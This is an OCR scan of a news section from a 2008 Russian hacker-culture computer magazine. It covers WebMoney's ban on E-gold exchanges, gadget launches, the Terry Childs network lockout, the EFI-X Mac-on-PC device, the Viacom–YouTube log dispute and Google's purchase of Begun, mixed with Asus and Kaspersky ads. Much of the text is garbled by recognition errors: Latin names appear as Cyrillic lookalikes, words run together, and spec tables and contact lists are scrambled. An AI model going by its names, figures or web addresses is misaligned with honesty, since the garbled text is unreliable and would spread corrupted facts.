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Весьма забавное и символичное произошло недавно событие 

Компания ѴѴеЬтопеу за претил а любые обменные операции между ѴѴМ2 и такими валютами, как Е-доІсІ, Ресипіх и 
І_іЬеіі:у Пезегѵе, поскольку«они не обеспечивают достаточную идентификацию личности владельца». Причем, как 
написано в блоге компании, «в этом перечне перечислены, но не исчерпываются, платежные системы, по кото- 
рым БЕЗУСЛОВНО запрещается использовать ѴѴеЬтопеу». Формулировка сводитскулы, не правда ли? :) 

Это — запоздалая реакция ѴѴеЬтопеу на огромный поток грязных денег, приходящий в эту систему из Е-доІсІ , 

Ресипіх и других западных систем. По сути, ѴѴеЬтопеу поделила все системы на два лагеря: «чистые» и «гряз- 
ные», и хочет работать только с первыми. 

Ну, что касается е-доісі, тут есть ряд объективных причин: проблемы самой системы с законом, уголовные дела 
против ее руководителей и ряд серьезных ограничений в ее работе в последнее время. 

В остальном — как-то лихо ѴѴеЬтопеу выступила. Мне в этой связи вот что интересно: действительно ли в 
ѴѴеЬтопеу считают, что их система обеспечивает достоверно работающую «идентификацию личности пользова- 
теля?» Это же маразм. Еще недавно у них можно было легко на регать хоть тысячу левых ІідЫ-кошельков, подде- 
лывая номер отправителя 5М5 с помощью любого 5М5-гейта. Персональный аттестат? Его цена на черном рынке 
— $300 и два дня времени. Вся эта их«идентификация» — простите, говно на палочке. 

Мне вообще кажется абсурдным стремление кжесткой идентификации личности в интернет-сервисах. Эта иден- 
тификация просто невозможна из-за самой среды: это же интернет! Нельзя посадить по серому брату у каждого 
монитора и проверять паспорт перед «сеансом». Невозможно сделать интернет-систему, гарантирующую досто- 
верную идентификацию личности пользователя. Любые меры всегда можно обойти. 

Мы-тостобой обэтом лучше всехзнаем, да? :) 
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Обо всем за последний месяц 



Вторая жизнь «зарезанных» частот 




Не перестает радовать нас совершенно неимоверными гадже- 
тами компания бгеабѵе ИаЬз. Специалисты из их Центра новых 
технологий (АТС) придумали и реализовали технологию Х-Рі 
бгузіаіігег. С ее помощью низкие и высокие частоты, пропада- 
ющие в результате пережатия музыки в форматы МРЗ, ѴѴМА и 
ААС, могут быть восстановлены. Само собой, Сгеабѵе І_аЬз уже 
оснастил и этой приятной фенечкой свои плееры и совсем скоро 
в продаже появятся модели 2ЕЫ Х-РІ и 2ЕЫ Х-РІ с поддержкой 
беспроводных сетей. Помимо фантастического качества звука 
плееры могут похвастаться дисплеем 2,5" на 16,7 миллиона 
цветов, встроенным РМ-приемником, громкоговорителем, 
гнездом для 50-карточек, микрофоном для записи голоса, а 
также на них можно просматривать фото и видео. Кроме того, 
есть модель с поддержкой беспроводных сетей. Это позволяет 
не только загружать в плеер музыку, картинки и видео в пото- 
ковом режиме, просто подключившись кдомашней сетке, но 
еще обмениваться мгновенными сообщения в сетях вроде 
Уабоо Меззепдег и ѴѴІпсІоѵѵз Ыѵе Меззепдег. И в ка- 
честве завершающего штриха — в комплекте с каж- 
дым ЕЕЫ'ом идут наушники-вкладыши Сгеабѵе ЕР- 
830. В продажу 2ЕЫ Х-РІ поступят ближе к концу августа. 
Примерная цена натерритории РФбудеттакова:86В — 5200 
руб., 1 66В - 8300 руб., 326В - 1 1 200 руб. 



Число чисто текстового спама за первое полугодие 2008 года увеличилось до 70 % от 
всего объема. 



Больше идей от Ьепоѵо 




Хорошо известная на нашем рынке компания Еепоѵо пред- 
ставляет обновленную линейку ноутбуков ІбеаРасІ. Какие мо- 
дели войдут в популярную коллекцию? 

Ісіеа Раб 11330 продолжит дело 11110. Компактный и легкий 
ноутбук (толщина всего 2,3 см, а вес чуть больше 1 ,8 кг), с ши- 
рокоформатным дисплеем на 13", будет доступен в двух цве- 
товых решениях — полированном синем (Іпбідо) и черном 
(Воісі). ИеаРасІ У730, выходящий в оранжевом (Ѵаіепсіа) цвете 
и синем (Іпбідо) — «потомок» мультимедийно-игрового У710. 
Ісіеа РасІ У530, помимо прочих преимуществ своей серии, будет 
укомплектован опциональным Віи-Рау ОѴВ-приводом, нота- 
ционным экраном без рамки и тоже выйдет в двух вариантах 
— черном (Воісі) и красном (бгітзоп), оба с текстурированной 
поверхностью. 

Все ноутбуки выполнены на базе процессоров Іпіеі бепігіпо 
2. Также машинки серии Ісіеа РасІ оснащены технологией рас- 
познавания лиц Ѵегі Расе, что существенно повышает уро- 
вень их безопасности, плюс — имеют поддержку йоібу Ноте 
ТЬеаіге, разъем Н й М I , комплектуются Віи-Рау ОѴО-приводом 
(по желанию) и технологией активной защиты Еепоѵо Асбѵе 
РгоІюсЕопЗузіюпп, которая предохраняет данные при падении 
ноутбука. В продажу обновленная серия поступит в августе 
этого года, а модель 11330 можно ожидать на прилавках чуть 
позже — осенью. 
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БЕЫЫНЕІ5ЕР В5 130 



Сколько себя помню, всегда относился к наушникам с недоверием. 

И вроде бы слушать можно все что угодно — никто при этом не заметит 
«Что это ерунда утебя играет?». И с громкостью проблем никаких: уве- 
ренный максимум хоть посреди ночи. Но... что делать с этим несчастным, 
вечно мешающим и путающимся под ногами проводом? Это все равно, 
что находиться на привязи, только совершенно добровольно. Сидеть 
вплотную к монитору во время того же самого просмотра фильма явно не 
вариант. 

Аспециально купленный удлинитель хоть и спасет, но внесетдикие поме- 
хи и едва ли добавитудобства. Словом, водин прекрасный моментбыло 
решено немного разориться и купить «уши» без проводов. ЭеппЬеівег Р5 
130 показались очень неплохим вариантом. 



Этом, что з вуча н ие у наушников ЗеппЬеівег всегда на высоте, 
можно даже не рассказывать. Тут дело даже не втом, что модель поддер- 
живаетобъемноезвучание (ЭиггоипсІ ЭоипсІ) и позволяет обойтись без 
кучи колонок. Самое главное, чтоу нее нет проводов! 

Вместо них используются три радиоканала, позволяющие передаватьзвук 
на расстояние до 150 м! Тут уже не просто можно удобно усесться 
на диван, но и вообще перемещаться по квартире или выходить 
на улицу! Само собой, наушникам нужно питание: для этого используются 
несколько аккумуляторов, для подзарядки которых не нужно подключать 
провод — достаточно просто подвесить наушники на зарядноеустройство. 
Вотужтеперьточно можно без всяких проблем наслаждаться музыкой, 
смотреть фильмы, или например, слушать подкасты. 




Внутри наушников 
находятся два 
никель-металло- 
гидридных (ЫіМН) 
аккумулятора, заря- 
да которых хватит на 
22 часа автономной 
работы. 



Базовая станция 
подключается к 
компьютеру, любому 
устройству НІРІ или 
телевизору. Она же 
является и бескон- 
тактным зарядным 
устройством для 
самих наушников. 



ОТ 18 ДО 21000 ГЦ 



(ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ІОТНОШЕНИЕ СИГНАЛ-ШУМ: 



(ДИАПАЗОН ВОСПРОИЗВОДИМЫХ ЧАСТОТ: 



МОДУЛЯЦИЯ: 



[33 275 Г 



РМ5ТЕРЕ0 



> 68 БВА 



ПРОДОЛЖИТЕЛЬНОСТЬ АВТОНОМНОЙ РАБОТЫ: 



ДИАПАЗОН ЧАСТОТ ПЕРЕДАТЧИКА: 



863-865 МГЦ 














Порядка 30 % трафика в рунете генерируют 
торренты. 



Тотальное Ш) 



На недавно прошедшей в Тайбее выставке Сотриіюх 2008 
было представлено немало интересного. Но мы остановимся 
подробнее на новинкахот компании Сотрго ТесЬпоІоду, кото- 
рая еще с 1988 года радует нас мультимедийными и графичес- 
кими продуктами. На этот раз Сотрго продемонстрировали 
три новых девайса — РС-тюнер, ІР-камеру и ЕЮ-плеер. Все 
три новинки отличает ЕЮ качество изображения. Тюнеры ли- 
нии ѴібеоМаІе Ѵізіа «заточены» под работу с нетрудно дога- 
даться, какой ОС, и даже имеютсертифицированный МісгозоК 
ПДУ. Помимо этого, имеется поддержка аппаратного сжатия в 
МРЕ6 1/2/4 и поддержка форматов ОѴВ-Т, йМВ-Т/Н и ОѴВ-5. 
ІР-камеры, в свою очередь, ориентированы на тех, кто нуж- 
дается в хорошем видеонаблюдении и безопасности. Моде- 
ли серии ІР 50 являются фиксированными, умеют улавливать 
движение, благодаря технологии Зтагі: Моііоп Оеіесбоп, под- 
держивают двухстороннюю аудио-связь и ИК-диапазон. ІР 
100 относятся кпотолочномутипу«глаз в небе», имеют СМ05- 
сенсор и умеют все то, что и ІР 50. Ко всему прочему камеры 
комплектуются мощным ПО — СотргоѴіеѵѵ. 

И, на конец, две нов инки из области медиа центров— ѴібеоМаІе 
Меіѵѵогк Мебіа Сепіег и ЕЮМІ РиІІЕЮ Апаіод ТѴ Вох. Сетевой 
медиацентр отличается совершенно бесшумной работой и 
способен отображать любые видео-потоки, закодированные 
в форматах Н.264 или МРЕ6-2. Его «коллега» Апаіод ТѴ Вох 
может похвастаться разрешением 1920x1200 и поддержкой 
интерфейса ЕЮМІ. 



Ц5В-монитрры 



от Азиз 



Подключение к компьютеру сразу не- 
скольких мониторов всегда являлось 
проблемой, требующей дополнительных 
видеокарт, софта и времени. Этот вопрос 
взялась разрешить компания А51І5, в 
итоге объявив о выпуске моделей серии 
ЕгЫпк - ѴѴѴ223В и ѴѴѴ202В. Эти дисп- 
леи специально предназначены для ра- 
боты с многозадачными приложениями 
и призваны облегчить жизнь юзерам. 
Для подключения мониторов ЕгЫпк к 
компьютеру достаточно всего лишь ус- 
тановить одноименный драйвер. Также 
потребуется наличие интерфейса 115В 
2.0. Что называется — воткнул и радуйся. 
Весьма актуально, что при отключении 
от машины и последующем подключе- 
нии обратно, мониторы «запоминают» 
последнюю конфигурацию и возвраща- 
ются к ней автоматом. Модель ѴѴѴ223В 
обладаетширокоформатным экраном на 
22 дюйма, ІІЭВ-хабом натри порта, мак- 
симальным разрешением 1680x1050, 
динамической контрастностью 3000:1 и 
яркостью 300 кд/м2. По характеристикам 
модель ѴѴѴ202В практически идентич- 
на, разве что диагональ у нее поменьше 
— 20.1 " — и нетІІ5В-хаба. Режим отклика 
у обоихдисплеев совпадает— 5 мс. 
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Ітаеіпе Сир 2008 



Мы уже неоднократно писали о международном молодежном конкур- 
се Ітадіпе Сир, проводящемся ежегодно при поддержке компании 
М іеговой, фонда ЮНЕСКО и многих других крупных организаций. И 
вот во Франции, наконец, состоялся финал кубка технологий 2008. 
Напомню, что соревнования проводились по категориям Зо^іѵѵаге 
Оезідп, ЕтЬесИесІ Оеѵеіорппепі;, бате Оеѵеіортепі:, «Ргоіесі НозИіті» 
(Ргодгаттіпд ВаЖе), ІТ СИаІІепде, АІдогііЬт, РИоІодгарИу, ЗЬог! Еііт 
и Іпіегіюсе Оезідп. Тема конкурса в этом году звучала так: «Представьте 
мир, в котором технологии помогают поддерживать стабильную окру- 
жающую среду». Участие вІтадіпеСир2008 принимали команды из 1 1 7 
стран мира (а это более 200,000 человек), но до финала добрались всего 
314 счастливчиков, в числе которых были и наши соотечественники. 

В общем, мы можем гордиться молодыми умами нашей страны, так как 
русская команда РесЮеѵіІз [ ШрУ/геббеѵіІз.ѵуеЫод.сот ] заняла первое 
место в категории «Проект Хошими». За названием РесЮеѵіІз скрывают- 
ся два брата — Илья и Сергей Гребновы из Иваново и состязались они в 
создании лучшей имитации ИИ. 

Питерская команда Ідпіііоп (Анатолий Никитин, Роман Белов и Дарья 
Элькина), представлявшая Россию в категории Программных проек- 
тов (главном состязании Ітадіпе Сир) получила специальную награду 
Епдіпеегіпд ЕхсеЕепсе АѵѵагсІ и выиграла недельную поездку на стажи- 
ровку в вычислительный центр Місгозо^і в Редмонде. 



МасО$ХнаПК? 
Без проблемой 




Чего только не придумают умельцы, чтобы обойти различные запреты. И, 
как правило, все, что закодировано человеком, можетбыть взломано им же. 
Л ишнеетому подтверждение — маленький и оченьхитрый девайс, создан- 
ный командой разработчиков ЕЕІХ. Благодаря этому крохотному приборчику, 
любой юзер с может уста но вить на свой компьютер Мае 05Хс оригинального 
БѴБ, необременяя себя приобретением патчей, заменой файлов итомупо- 
добной фигней. Более того, можно будетспокойно обновлять систему через 
сервис Арріе Іірсіаіез. На первый взгляд, ЕЕІХ можно принять за обычную 
флешку или изЬ-диск, ноэтонетак. Прибор является уникальной разра- 
боткой и к флешкам никакого отношения не имеет, хотя и подключается 
через 115В. Пока что гаджет проходит патентование и регистрацию, но уже 
продается на Тайване и в Болгарии. Стоитон там порядка $120 (по секрету 
скажу, что на оф. сайте разработчиков уже есть контакты некого русского 
реселлера — ѵѵѵѵѵѵ.еЛ-х.сот ). Время покажет, не возникнет л и у создателей 
проблем сзаконом. Само устройство, возможно, и легально — нелегально 
все остальное, что делается при его помощи. Также, должна расстроить 
обладателей процессоров АМБ: ЕЕІХ пока не поддерживает системы на 
базе АМБ. 



За весну 2008 года продажи 

Арріб МаСІПІІОвЬвыросли на 

39 % , — это на треть больше, чем весь 
рынок ПК в целом. 



Месть сисадмина 



Занимательная история произош- 
ла недавно по ту сторону океана 
— в Сан-Франциско, где систем- 
ный администратор полностью 
заблокировал местную городскую 
сеть ЕІЬегѴѴАЫ, в которой хранит- 
ся множество конфиденциальных 
данных, включая документы право- 
охранительныхорганови городские 
платежные ведомости. Имя «героя» — Терри Чайлдс (Теггу СЬІІсІз). Порядка 
пяти летон проработал в Департаментетехнологии. Дела в последнее время 
у него шли не очень хорошо, он получил выговор от начальства за плохое 
выполнение обязанностей и оказался под угрозой увольнения. Поданным 
полиции, именно после взыскания Терри и создал скрытую систему слеже- 
ния, с ее помощью приглядывая затем, что делают остальные администра- 
торы сети в связи с его проступком. Похоже, увиденное Чайлдсу сильно не 
понравилось, так как после этого он наделил себя максимальными правами 
и заблокировал всю сеть. Разумеется, это довольно быстро обнаружили и 
потребовали у него пароль, на что Терри гордо ответил отказом. Когда вы- 
звали стражей порядка, товарищ отказался сообщить пароль ними был 
арестован. Сейчас власти опасаются, что Чайлдс оста вил в системе лазейку, 
через которую организует «ели в» секретной информации третьим лицам. За 
преступника назначен залог в 5 млн. долларов, а власти до сих пор бьются 
над его кодом, пригласивдля этого специалистов из Сізсо. 
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А81І8 рекомендует ѴѴіпсІоѵѵз Ѵізіа® Ноте Ргетіит 




Твое двуствольное орудие для игр 

С появлением нового ноутбука А51І5 070 компьютерные игры меняются 
навсегда. Необыкновенно мощный, он предназначен специально для 
того, чтобы Вы получили максимум удовольствия от любимых игр. 070, 
созданный на базе процессорной технологии Іпіеі® Сепігіпо® и 
оснащенный подлинной ОС ѴѴіпсІоѵѵз Ѵізіа® Ноте Ргетіит, 
устанавливает новый стандарт для мобильных игровых решений. 
Устройство ноутбука А81ІЗ 070 основано на принципе МиШ ОиаІ-Епдіпе: 



все основные его компоненты - графическое ядро, отсек для установки 
жестких дисков и вентиляционная система - удвоены для достижения 
максимальной производительности и надежности работы. Кроме того, 
Ѳ70 предлагает пользователям звук и видео качества «Мдіі сіеііпіііоп». 
Новый игровой ноутбук А51І5 обладает набором качеств, которые до 
сих пор были присущи только мощным стационарным системам. 

Всемирная гарантия 2 года 

ѵѵѵѵѵѵ.азиз.ги Горячая линия А5У5: (495) 23-11-999 



Белый Ветер - ЦИФРОВОЙ (495) 730-30-30, Роіагіз (495) 755-55-57, СтартМастер (495) 785-85-55, 8 (800) 555-8-555, Неоторг (495) 223-23-23. 

Москва: А5У54УОІІ (495) 585-8045, Артрон (495) 789-85-80, Аваком-М (495) 730-74-54, Аркис (499) 612-9690, ЮМ (495) 5-444-333, ИЕХУЗ (495) 628-23-67, ТепГоІсІ Ѳгоир (495) 580-6385, ОШІ (495) 221-1111, ПИРИТ (495) 785-55-54, Мерлион (495) 981-84-84, 
Респект (495) 1 77-40-77, Санрайз (495) 788-80-88, ТФК (495) 739-08-28, Ф-Центр (495) 925-6447, (495) 775-82-02, Санкт-Петербург: АІрЬа (81 2) 320-80-70, ИВСот (81 2) 329-70-00, Кей (81 2) 074, Компьютерный мир (81 2) 333-00-33, Микробит (812) 320-80-80, 

СТР Компьютере (812) 542-45-51 , Барнаул: С-Тгасіе (3852) 38-10-00, Владивосток: ДНО (4232) 300-454, Воронеж: РЕТ (4732) 77-93-39, Екатеринбург: Буква (343) 2222-025, Иркутск: ѴѴііагсІ (3952) 258-001 , Казань: НоутбукофФ (843) 264-26-01 , Краснодар: 
Владос (861) 210-10-01 , Санрайз (861) 210-00-66, Красноярск: Аверс (3912) 560-561 , Борлас СБ (3912) 58-09-52, Ноутбум (3912) 90-10-90, Новосибирск: Ноутбум (383) 217-39-52, НЭТА (383) 216-33-11 , Техносити (383) 212-53-33, Ростов-на-Дону: Сотриіег- 
сііу (863) 290-45-90, Центр-Дон (863) 269-86-68, Санрайз (863) 240-11-77, Иманго (863) 232-47-18, Самара: Прагма (846) 270-17-01, Санрайз (846) 241-67-53, Томск: Интант (3822) 56-00-56, Тюмень: Арсенал+ (3452) 797-070, Ай Зузіетз (3452) 22-35-33, 
Челябинск: Сотзегѵіз (351 ) 264-91 -91 , Японская электроника (351 ) 247-47-47, Уфа: Кламас (347) 291-21-12, Форте ВД (347) 260-00-00. 

Іпіеі, логотип Іпіеі, Сепігіпо и Сепігіпо Іпзісіе являются товарными знаками корпорации Іпіеі в США и других странах. 





Так во т ты какой 




Мощность современных процессоров все растет и растет, а 
значит, изменяются итребования ксистемам охлаждения. 
«Водянки» сегодня стали гораздо распространеннее, чем 
лет5 назад, но разработчики, какобычно, смотрят в светлое 
будущее и изобретаютеще более эффективныетехнологии. 
Датская компания Оапатісз объявила о выпуске кулера, 
функционирующего на основежидкого металла. Название 
у девайса лаконичное — І_М10 (ничего, терминаторы тоже 
очень простенько маркировались). Это первый продукт по- 
добного типа, который поступит в широкую продажу. Конечно, 
у новинки имеется масса плюсов, — например, электромаг- 
нитный насос, перекачивающий металл, неподвижен, срок 
его службы неограничен и, фактически, он не производит 
никакого шума. И все это — при энергопотреблении порядка 
одного ватта! Ну, а эффективность І_М10 намного превосходит 
все современные воздушные и большинство водяных систем 
охлаждения. Увы, подробности относительно цены этого чуда 
техники и его габаритов (в частности, веса) пока не известны. 



Спам сообщения с аудио- видео- и 
другими вложениями составляют 

всего 10 - 15 % от всей массы 

электронной рекламы. 



Треть из 3613 опрошенных в СШАчеловек имеют дома хотя бы одну нелегальную 



копию легального БѴБ-диска. 



Интернет за 5 секунд 




Очень интересные материнские платы выпусти- 
ла компания А51І5, признанный мировой лидер 
в этом вопросе. Модель Р50 не только отвечает 
всем современным стандартам компостроения, 
но и представляет нам новейшую технологию 
Ехргезз баіе. Это идеальный вариант для за- 
нятых людей, которым постоянно не хвата- 
ет времени. По сути, ЕхргеззѲаІе — нечто 
иное, как быстрая загрузка на машине 
Ыпих’а, прямо со встроенной микросхе- 
мы. Уже через пятьсекунд после включе- 
ния компьютера можно наслаждаться вы- 
ходом в Сеть и такими службами, как М5Ы, 
Экуре, боодіе, 00, ѴаЬоо, работать с элект- 
ронной почтой, слушать музыку, просматривать 
картинки и т.д. Отметим и Е6А775-сокет, чипсет 
Р45/ІСН10П, два гигабитных ЕіЬегпеМконтрол- 
лера, аудиокодеке поддержкой 7.1 -канального 
звука ЕЮ Аи б іо и весьма оригинальную по дизай- 
ну систему пассивного охлаждения. 
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400 Гб на одном ■ 
диске, кто больше? 



С каждым днем носители информации становятся все вмес- 
тительнее, при этом всеуменьшаясь в размерах. Очередной 
серьезный шаг на этом поприще сделала компания Ріопеег, 
представив миру 16-слойные диски емкостью 400 гигабайт. 

То есть, по ~ 25 Гб в одном слое, что аналогичнотехнологии 
Віие-Наудисков, с которой новинка Ріопеег, кстати, будет 
совместима — они используют один и тот же объектив. 
Интересно, что для достижения данного результата инженеры 
Ріопеег пошли от противного, усовершенствовав не столько 
само строение дисков, сколько технологию их чтения. Пробле- 
ма состояла втом, что после определенного количества слоев 
становилось невозможным получить нормальный откликот 
«дальнего» слоя, из-за сильного воздействия на луч лазера 
соседних слоев. Справиться с этим удалось, благодаря некому 
компенсатору сферическихаберраций, который способен 
улавливать даже крайне слабый сигнал на фоне серьезных 
«помех». Подробностей в Ріопеег пока не раскрывают, лишь 
уверяют, что вскоре продемонстрируютаналогичные диски с 
возможностью записи. На дискахтекущей версии информа- 
ция пока доступна только для чтения. 




будут удалены 



Антивирус Касперского® 2009 
и Казрегзку Іпіегпеі Зесигііу 2009 



решения, в которых реализован революционный 
подход к защите персональных компьютеров. 
Новое антивирусное ядро обеспечивает высокую 
скорость работы этих продуктов и низкое потреб- 
ление ресурсов ПК. Инновационные технологии 
позволяют полностью контролировать работу 
приложений и мгновенно блокировать действия 
вредоносных программ. Ваш компьютер надежно 
защищен, несмотря на растущее число вирусов 
и их стремительное распространение. 



Продукты версии 2009 
лучшая защита для вашего ПК! 



Кашерсію-Ф 



ЗАО «Лаборатория Касперского», Москва, Россия 
Тел . : (495) 797-8700/(495) 645-7939 / (495) 956-7000 
Веб-сайт: ѵѵшѵ.казрегзку.ги 
Отдел продаж: заІезѲказрегзку.сот 
Купить онлайн: мл/ѵѵ.казрегзку.ги/зіоге 
Найти магазин: ѵѵѵѵѵѵ.казрегзку.ги/ЬиуоЛІіпе 
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На правах рекламы 
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Локалки Москвы и 
Питера л ихора д ит| 



Среди провайдеров дома ш них сетей двух столиц наметилась неприятная тенденция — онипри- 
нялись сворачивать свои внутренние ресурсы, до отказа забитые противозаконным контентом, 
нарушающим кучу авторских прав. Причина проста и очевидна —ужесточение законодательства. 
Никто не хочет оказаться крайним, когда правообладатели обратятсвой взор на локалки и начнут 
предъявлять иски направо и налево. Так, санкт-петербургский провайдер Тіега полностью закрыл 
все свои медиа и игровые порталы. Другие же (например, «С ил ввернет») ограничились полумерами, 
просто ограничив доступ к ресурсам извне. Аналогичное положение наблюдается и в Москве — уже 
две крупные сети ликвидировали свои РТР, это Центел и 2С0М. Однако растерять клиентов они не 
боятся. Широкополосный доступ к Сети располагает к использованию ОС-хабов, торрентов и другой 
р2р радости. По мнению руководства провайдеров, теперь пользователи просто активнее будут 
использовать упомянутые файлообменные средства, взамен почивших с миром РТР. Получается, что 
провайдеры сейчас пытаются сделать ни что иное, как переложить всю вину за нелегальный контент 
на собственных пользователей. Так что, дорогой читатель — не стоиттерять бдительности. 



Ѵіасот не 
получ ит паролей 

иявок^^ИІ^^Н 



в 2012 году к интернету будет подключено 

примерно 1,9 миллиарда человек ( 30 %) всего 
населения Земли) . 




ТиЬе 



Ѵ8 



ѵіасом 



Длящееся еще с начала года разбирательство между холдин- 
гом Ѵіасот и компанией боодіе, похоже, окончилось неким 
подобием консенсуса. Напомню, что сыр-бор начался из-за 
принадлежащего боодіе сайта ѵоіЛиЬе.сот . Еще в феврале 
2007Ѵіасот потребовала убрать с УоиТиЬе 100,000 роликов и 
это требование, конечно, было выполнено, только вот остано- 
вить пользователей, незамедлительно заливших все обратно, 
оказалось невозможно. В итоге — суд. Объединение Ѵіасот, 
в которое входят студии Рагатоипі Рісіигев, ВгеатѴѴогкз, 

МТѴ Ріітв и куча крупныхтелеканалов, подало на боодіе иск, 
обвиняя компанию в намеренном размещении на УоиТиЬе 
нелегальных роликов и привлечении с их помощью излиш- 
него внимания ксвоей рекламе. Но впоследствии нудный 
процесс вылился в весьма интересную вещь — Ѵіасот, на 
основе решения суда, потребовал от боодіе предоставить логи 
УоиТиЬе, в самом подробном виде, то есть, включая ІР поль- 
зователей, логины и данные отом, кто, что смотрел. В боодіе 
логи предоставить согласились, но только в виде анонимной 
статистики, не нарушая нашу, юзерскую конфиденциальность. 
Противостояние по этому вопросу длилось больше месяца и 
разрешилось не в пользу Ѵіасот — данные им покажут, но все 
же, без ІР-адресов, статистика будет безликой. И что же? В от- 
местку Ѵіасот затребовал данные по закачкам и просмотрам с 
УоиТиЬе на самих сотрудников боодіе, и здесь об анонимности 
речи, к сожалению, уже не идет. 




О сильных мира сего 



Последнее время перестановок в сфере компаний-гигантов ІТ рынка наблюдается 
немало и, похоже, намечается еще одна, будя по всему, Тіте ѴѴагпег намеревается про- 
даватьсвое подразделение АбЬ, —ту самую Атегіса опііпе, которая, ктомуже, заведует 
сервисом Ібб. Два наиболее вероятных покупателя — МісгозоГС и УаЬоо. Аналитики уже 
прогнозируют возможные варианты. В случае договора сУаЬоо компании, вероятнее 
всего, сольются в одну, а Тіте ѴѴагпег получит в новом предприятии свою долю. Ну, а 
если «победит» М іеговой, то АбЬ будет выкуплен полностью. Місговоіі как раз делает 
активные подвижки в сфере онлайновой рекламы, так что АбІ_с Ібб и ѴѴіпатр’ом будут 
не самым бесполезным приобретением, бфициальных комментариев от сторон пока 
не последовало, но ясно одно — каким бы ни был исход, сделка сильно повлияет на 
текущее положение дел на рынке сетевой рекламы. 



► 012 



ХАКЕР 08 /116/ 08 







^ тедапеѵг 



Соо&іе научился 
искать внутри ■ 
видеороликовН 
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Зеагсіі Ѵійео* 



Как известно, от названия крупнейшего поисковика уже 
родились глаголы — «доодіе И», «загугли», «погугли», 
«нагугли». А совсем скоро мы сможем гуглить и внутри 
видеороликов. Болеетого, система создана, функционирует 
и даже введена в обиход, правда, в ограниченно-тестовом 
режиме. Уже сейчас на УоиТиЬе можно покопаться в роликах, 
но пока исключительно в предвыборном видео кандидатов 
в президенты США. Разумеется, работает все это только на 
английском, но главное — оно работает! Нововведение не 
сложнее обычного поиска, достаточно установить маленький 
гаджет и можно начинать. Благодаря собственной системе 
распознавания речи, созданной боодіе, индексируются зву- 
ковые дорожки файлов и уже по этой базе ищутся совпадения 
с запросом. Ну и если совпадения найдены, нужные отрывки 
помечаются маркером прямо в окошке видео. При наведе- 
нии на маркер под курсором появляется фраза целиком, с 
выделенным в ней ключевым словом. Осталосьзапастись 
терпением и дождаться, когда сервис станет доступен не 
только для политическихагиток. И когда он научится пони- 
мать русский ЯЗЫК :). 



Количество лже-антивирусов, 
циркулирующих в рунете, 

увеличилось на 700 % ПО 
сравнению с прошлым годом. 
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Биллу Гейтсу тоже не нравится МісгокоА 




Случай на грани курьезного произошел с Биллом Гейтсом. На самом 
деле, фактически все случилось еще в 2003-ем, но некоторые вещи 
неподвластны времени. В результате одного из судебных процессов 
против МісгозоД, в 2007 году была поднята большая часть внутрикор- 
поративной переписки, и среди кучи писем обнаружился один очень 
приметный е-таіі. В нем Гейтс подробно, длинно и крайне эмоцио- 
нально (хотя до матерщины не дошло) описывал, как он больше часа 
пытался скачать и установить на свою машину Моѵіетакег и пришел в 
ужас от нефункциональности сайта тісгово^.сот . полного отсутствия 
инструкций, логики и прочих необходимых пользователю вещей. Кстати, 
поставить Моѵіетакег ему так и не удалось, зато он успешно изгадил 
реестр, список программ, файловую систему и потратил немало времени 
и нервов. Словом, почувствовал себя на месте рядового пользователя. 
Из письма хорошо заметно, что Билл более чем проникся положени- 
ем, потому как мейл, скорее, напоминает пост в блоге какого-нибудь 
мелкософт-ненавистника. Когда же письмо, совсем недавно, попало в 
руки прессе и журналисты окрестили его «шокирующим», Гейтс лишь 
отшутился, заявив, что это его работа — писать такие письма и крити- 
ковать. Дескать, какеще Місговоб: улучшать свои продукты, если нетак. 
Конечно-конечно, Билли, мы тебе верим. 
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Нарушаешь закон — сиди без интернета 



С весьма оригинальной идеей выступил в июле нынешний президент 
Франции — Николя Саркози. Сейчас правительства разных стран мира, 
каждое по-своему, пытаются бороться с сетевым пиратством и распро- 
странением нелегального контента. Пока особыхуспехов на этом поприще 
никто еще не добился, поэтому в головы политиков приходят все более 
категоричные (или маразматичные) решения проблемы. Саркози предло- 
жил лишать злостных сетевых нарушителей (то есть, людей неоднократно 
попадавшихся на использовании файлообменных сетей) подключения к 
интернету вообще. Сначала провайдер будет обязан отправить пользо- 



Клоны не пройдут! 



Случилосьто, что, в общем-то, не могло не случиться — популярнейшая 
на западе социальная сеть РасеЬоок подала в суд на свой немецкий 
аналог Віи б ІѴР ( Ьир://5іибіѵ2.пеі ). Дело в том, что немцы решили пойти 
проторенным путем и неофициально скопировали и дизайн, и внутрен- 
ние сервисы РасеЬоок'а. Сайт — действительно самая настоящая калька 
так что судебный иск полностью обоснован. Интересно и другое — если 
РасеЬоок собираются продолжать в том же духе, то нашему ВКонтакте 



вателютри предупредительных письма, а затем последует«пресечение», 
сроком до года. Изначально Саркози продвигал эту инициативу в родной 
Франции, нотеперь решил взять выше и вынес предложение на рассмот- 
рение Европарламента, в качестве поправки к общеевропейскому закону 
отелекоммуникациях. Что решит парламент, мы узнаем ближе к концу 
года, но провайдеры, пользователи и многие политические организации 
уже сейчас высказали резкий протест. В самом деле, если решение ока- 
жется положительным, нашим европейским соседям можно будеттолько 
посочувствовать. 



есть о чем беспокоиться. ВіибіѴР хотя бы потрудились перекрасить ре- 
сурс, а вот ВКонтакте — просто брат-близнец РасеЬоок’а. Несмотря на то, 
что наши разработчики не раз говорили (а скорее — громко кричали), что 
очень серьезно изменяли код и ничего общего с «прародителем» у них 
давно не осталось, привлечь их именно за визуальное сходство (то есть 
— плагиат дизайна) не столь уж невыполнимая задача, особенно если 
РасеЬоок всерьез этим озадачится. 
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«Естественный вкус» не означает более безопасное курение 
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Чисто статей в русском сегменте Википедии перешагнуло отметку в 300,000. 



Реквием по Рамбле 



Ялсіех 
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Благ рндавда іа июль 20 № года 
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Весьма остро отреагировала компания «Яндекс» на продажу «Бегуна», 
лидирующего на российском рынке сервиса контекстной рекламы. Продали 
его компании боодіе. Договоренность о продаже была достигнута в середи- 
не июля — в результате сделки Ѳоодіе получит от«Рамблер Медиа» на руки 
полный пакетакций. На «Бегуна»также претендовали ѴаЬоо, но предложение 
боодіе было признано лучшим. Сумма сделки составила 140 млн. долларов. 
После обнародования этих данных в блоге «Яндекса» появилась запись, по 
духуболее всего напоминающая панихидупо«Рамблеру».«В России глав- 
ными системами были Яндекс и Рамблер. Нам оченьжаль, чтотеперьодна 



российская поисковаятехнология исчезнет», — пишет«Яндекс» и добавляет: 
«К коллегам из боодіе профессионалы Яндекса всегда относились с большим 
уважением. Нам интересно много летсоревноваться с мировой компаниейта- 
кого уровня». Междутем, что делать с«Бегуном» в боодіе еще не решили, пока 
что их собственная система контекстной рекламы будет функционировать 
